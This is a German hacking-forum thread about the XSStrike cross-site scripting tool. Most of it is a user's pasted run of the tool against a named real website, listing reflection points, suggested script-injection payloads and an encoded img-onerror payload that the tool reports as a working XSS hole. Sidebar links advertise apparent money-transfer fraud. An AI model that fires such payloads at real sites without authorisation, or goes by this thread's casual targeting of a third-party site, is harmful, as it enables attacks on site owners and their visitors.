Anmelden
Benutzerkonto erstellen
Als Gast hast du nur eingeschränkten Zugriff!
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
- Antworte auf Themen oder erstelle deine eigenen.
- Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
- Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
- Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
XSStrike - Fuzz and Bruteforce Parameters for XSS
Erstellt von
jmPesp
, 28.06.2017 14:46
Nach oben
Melden
#3
Geschrieben 29 June 2017 - 19:03 Uhr
Mini Rick
-
- Members
-
- 26 Beiträge
- 4 Bedankt
Script Kiddie
Likes
12
-
Android [root] -
Linux
Ist Python 3 oder?
Nein ist es nicht. Funktioniert auch gar nicht mit python3.
Hast du die Requirements installiert?
Leider funktioniert das Tool bei mir aber auch nicht sonderlich gut...
Die Seite macht aus < und > die Zeichen < und > also keine Lücke. Trotzdem behauptet das Tool welche gefunden zu haben...
Made with <3 by Somdev Sangwan : TeamUltimate.in
_ _ _______ _______ _______ ______ _____ _ _ _______
\___/ |______ |______ | |_____/ | |____/ |______
_/ \_ ______| ______| | | \_ __|__ | \_ |______
Enter "help" to access help manual
-----------------------------------------------------------------
[?] Enter the target URL: http://biblehub.net/search.php?q=d3v
[+] WAF Status: Offline
1. Fuzzer
2. Striker
3. Hulk
Enter your choice: 1
--------------------------------------------
[+] Number of reflecttions found: 16
[>] Scanning all the reflections
[>] Testing reflection number: 1
[!] Reflection found as data or plaintext on the page.
[+] Suggested Payload: </title><script>alert(1);</script>
[>] Testing reflection number: 2
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 3
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 4
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 5
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 6
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 7
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 8
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 9
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 10
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 11
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 12
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 13
[!] Reflection found as an attribute in an empty tag.
[!] Parameter was reflected in an attribute of an empty tag.
[+] Suggested Payload: "/><script>alert();</script><br attr="
[>] Testing reflection number: 14
[!] Reflection found as data or plaintext on the page.
[-] No successful fuzzing attacks. Check manually to confirm.
[>] Testing reflection number: 15
[!] Reflection found as data or plaintext on the page.
[-] No successful fuzzing attacks. Check manually to confirm.
[>] Testing reflection number: 16
[!] Reflection found as data or plaintext on the page.
[-] No successful fuzzing attacks. Check manually to confirm.
[!] Scan complete. List of suggested payloads:
</title><script>alert(1);</script>
"></a><script>alert();</script>
"/><script>alert();</script><br attr="
[?] Do you want to use striker? [Y/n] Y
--------------------------------------------
[>] Payloads loaded: 17
[>] Striking the paramter(s)
[>] Testing parameter: q
[>] Payloads injected: 4 / 17
[+] XSS Vulnerability Found!
[+] Parameter: q
[+] Payload: %3c%69%4d%67%20%73%52%63%3d%78%3a%61%6c%65%72%74%60%60%20%6f%4e%45%72%72%6f%72%3d%65%76%61%6c%28%73%72%63%29%3e
[?] Keep the scan running? [y/N] y
[>] Payloads injected: 17 / 17
[-] 'q' parameter not vulnerable.
[!] Strike completed.
[+] 1 Parameter is vulnerable to XSS.
#4
Geschrieben 30 June 2017 - 07:35 Uhr
jmPesp
-
- Members
-
- 47 Beiträge
- 7 Bedankt
Script Kiddie
Likes
35
-
826012
-
iPhone
-
Windows, Linux, Mac OS
| Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
|---|---|---|---|---|---|
WESTERN UNION TRANSFER,BANK TRANSFER AND PAYPAL TRANSFER ARE |
 Classic Hacking
|
John Taylor |
|
|
|
WESTERN UNION TRANSFER,BANK TRANSFER AND PAYPAL TRANSFER ARE |
 Vorstellungen / Bewerbungen
|
John Taylor |
|
|
|
Western Union and Bank transfers are now available to the fo |
Classic Hacking
|
Jack Lawless |
|
|
Besucher die dieses Thema lesen:
Mitglieder: , Gäste: , unsichtbare Mitglieder:
This topic has been visited by 37 user(s)
Hacking & Security
Made with in germany.
